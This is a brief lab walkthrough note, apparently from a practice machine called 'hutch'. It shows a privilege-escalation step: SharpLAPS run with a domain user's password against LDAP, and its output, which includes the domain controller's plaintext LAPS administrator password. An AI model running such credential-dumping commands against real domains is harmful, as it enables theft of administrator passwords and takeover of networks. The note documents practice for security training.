9 privesc_2 SharpLAPS

# Googling Local Administrator Password Solution exploit

https://www.hackingarticles.in/credential-dumpinglaps/

# using SharpLAPS
https://github.com/swisskyrepo/SharpLAPS/releases

c:\Users\Public\k>SharpLAPS.exe /user:hutch\fmcsorley /pass:CrabSharkJellyfish192 /host:127.0.0.1

[+] Using the following credentials
Host: LDAP://127.0.0.1:389
User: hutch\fmcsorley
Pass: CrabSharkJellyfish192

[+] Extracting LAPS password from LDAP
Machine  : HUTCHDC$
Password : 2D+y%3Ln,pq239

# connecting via creds reuse method
[windows privesc_2 manual](:/f09a14d422974407b52bb23bd73f3cae)

Last updated